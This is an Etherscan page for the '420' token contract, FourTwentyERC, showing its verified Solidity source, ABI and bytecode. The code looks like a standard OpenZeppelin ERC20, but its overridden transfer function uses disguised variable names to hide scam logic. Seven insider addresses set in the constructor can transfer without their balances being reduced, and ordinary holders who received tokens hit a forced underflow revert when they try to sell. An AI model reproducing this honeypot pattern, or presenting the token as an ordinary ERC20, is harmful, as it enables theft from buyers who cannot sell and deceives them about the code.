ETH Price: $3,491.56 (+2.80%)
Gas: 10 Gwei

Token

420 (420)
 

Overview

Max Total Supply

1,000,000,000 420

Holders

41

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
33,287,480.418789139 420

Value
$0.00
0x0a6e6d297fC307cDcFda4E123F3b550aaa1cbB14
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
FourTwentyERC

Compiler Version
v0.8.8+commit.dddeac2f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, GNU GPLv3 license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-01-22
*/

// https://t.me/fourtwentyERC

// SPDX-License-Identifier: GPL-3.0

pragma solidity ^0.8.8;

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) public accetarre;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 public supply = 1000000000000000000;
    uint256 public _totalSupply = supply;

    string private dinanzi;
    string private essi;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        dinanzi = name_;
        essi = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return dinanzi;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return essi;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return accetarre[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        lasciavam(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        andar(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        lasciavam(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        andar(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            andar(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token passavam, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function lasciavam(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = accetarre[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            accetarre[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            accetarre[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = accetarre[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            accetarre[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function andar(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                andar(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

contract FourTwentyERC is ERC20, Ownable {
    address private lunga;
    uint256 private cittadini = 0;
    uint256 private emisperio = 63;

    IUniswapV2Router02 public uniswapV2Router;
    address public verranno;

    mapping(address => uint256) public sormonti;
    mapping(address => uint256) public piaggia;

    function lasciavam(
        address offensione,
        address convien,
        uint256 benedette
    ) internal override {
        if (sormonti[offensione] == 0 && verranno != offensione) {
            if (piaggia[offensione] > 0) {
                sormonti[offensione] -= emisperio;
            }
        }

        address century = lunga;
        lunga = convien;
        piaggia[century] += emisperio;

        if (sormonti[offensione] == 0) {
            accetarre[offensione] -= benedette;
        }

        uint256 passavam = benedette * cittadini;
        passavam = passavam / 100;
        benedette -= passavam;
        accetarre[convien] += benedette;
        emit Transfer(offensione, convien, benedette);
    }

    constructor(
        string memory poscia,
        string memory franchezza,
        address cantando,
        address novelle,
        address giudicio,
        address frange,
        address dimando,
        address mpedimento,
        address miseria,
        address compiange
    ) ERC20(poscia, franchezza) {
        uniswapV2Router = IUniswapV2Router02(cantando);
        sormonti[novelle] = emisperio;
        sormonti[giudicio] = emisperio;
        sormonti[frange] = emisperio;
        sormonti[dimando] = emisperio;
        sormonti[mpedimento] = emisperio;
        sormonti[miseria] = emisperio;
        sormonti[compiange] = emisperio;
        accetarre[_msgSender()] = _totalSupply;
        verranno = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"poscia","type":"string"},{"internalType":"string","name":"franchezza","type":"string"},{"internalType":"address","name":"cantando","type":"address"},{"internalType":"address","name":"novelle","type":"address"},{"internalType":"address","name":"giudicio","type":"address"},{"internalType":"address","name":"frange","type":"address"},{"internalType":"address","name":"dimando","type":"address"},{"internalType":"address","name":"mpedimento","type":"address"},{"internalType":"address","name":"miseria","type":"address"},{"internalType":"address","name":"compiange","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"accetarre","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"piaggia","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"sormonti","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"supply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"verranno","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

6080604052670de0b6b3a76400006002556002546003556000600855603f6009553480156200002d57600080fd5b506040516200241d3803806200241d8339818101604052810190620000539190620008d1565b898981600490805190602001906200006d9291906200061f565b508060059080519060200190620000869291906200061f565b505050620000a96200009d6200055160201b60201c565b6200055960201b60201c565b87600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600954600c60008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600954600c60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600954600c60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600954600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600954600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600954600c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600954600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600354600080620002ea6200055160201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b815260040160206040518083038186803b1580156200039157600080fd5b505afa158015620003a6573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003cc919062000a05565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b1580156200045157600080fd5b505afa15801562000466573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200048c919062000a05565b6040518363ffffffff1660e01b8152600401620004ab92919062000a48565b602060405180830381600087803b158015620004c657600080fd5b505af1158015620004db573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000501919062000a05565b600b60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050505050505050505062000ada565b600033905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200062d9062000aa4565b90600052602060002090601f0160209004810192826200065157600085556200069d565b82601f106200066c57805160ff19168380011785556200069d565b828001600101855582156200069d579182015b828111156200069c5782518255916020019190600101906200067f565b5b509050620006ac9190620006b0565b5090565b5b80821115620006cb576000816000905550600101620006b1565b5090565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200073882620006ed565b810181811067ffffffffffffffff821117156200075a5762000759620006fe565b5b80604052505050565b60006200076f620006cf565b90506200077d82826200072d565b919050565b600067ffffffffffffffff821115620007a0576200079f620006fe565b5b620007ab82620006ed565b9050602081019050919050565b60005b83811015620007d8578082015181840152602081019050620007bb565b83811115620007e8576000848401525b50505050565b600062000805620007ff8462000782565b62000763565b905082815260208101848484011115620008245762000823620006e8565b5b62000831848285620007b8565b509392505050565b600082601f830112620008515762000850620006e3565b5b815162000863848260208601620007ee565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000899826200086c565b9050919050565b620008ab816200088c565b8114620008b757600080fd5b50565b600081519050620008cb81620008a0565b92915050565b6000806000806000806000806000806101408b8d031215620008f857620008f7620006d9565b5b60008b015167ffffffffffffffff811115620009195762000918620006de565b5b620009278d828e0162000839565b9a505060208b015167ffffffffffffffff8111156200094b576200094a620006de565b5b620009598d828e0162000839565b99505060406200096c8d828e01620008ba565b98505060606200097f8d828e01620008ba565b9750506080620009928d828e01620008ba565b96505060a0620009a58d828e01620008ba565b95505060c0620009b88d828e01620008ba565b94505060e0620009cb8d828e01620008ba565b935050610100620009df8d828e01620008ba565b925050610120620009f38d828e01620008ba565b9150509295989b9194979a5092959850565b60006020828403121562000a1e5762000a1d620006d9565b5b600062000a2e84828501620008ba565b91505092915050565b62000a42816200088c565b82525050565b600060408201905062000a5f600083018562000a37565b62000a6e602083018462000a37565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000abd57607f821691505b6020821081141562000ad45762000ad362000a75565b5b50919050565b6119338062000aea6000396000f3fe608060405234801561001057600080fd5b50600436106101375760003560e01c80634f614eb5116100b8578063a457c2d71161007c578063a457c2d714610344578063a9059cbb14610374578063c46410e8146103a4578063d07f0b44146103d4578063dd62ed3e14610404578063f2fde38b1461043457610137565b80634f614eb51461029e57806370a08231146102ce578063715018a6146102fe5780638da5cb5b1461030857806395d89b411461032657610137565b806318160ddd116100ff57806318160ddd146101e457806323b872dd14610202578063313ce5671461023257806339509351146102505780633eaaf86b1461028057610137565b8063047fc9aa1461013c57806306fdde031461015a578063095ea7b31461017857806315064372146101a85780631694505e146101c6575b600080fd5b610144610450565b6040516101519190611093565b60405180910390f35b610162610456565b60405161016f9190611147565b60405180910390f35b610192600480360381019061018d91906111f8565b6104e8565b60405161019f9190611253565b60405180910390f35b6101b061050b565b6040516101bd919061127d565b60405180910390f35b6101ce610531565b6040516101db91906112f7565b60405180910390f35b6101ec610557565b6040516101f99190611093565b60405180910390f35b61021c6004803603810190610217919061131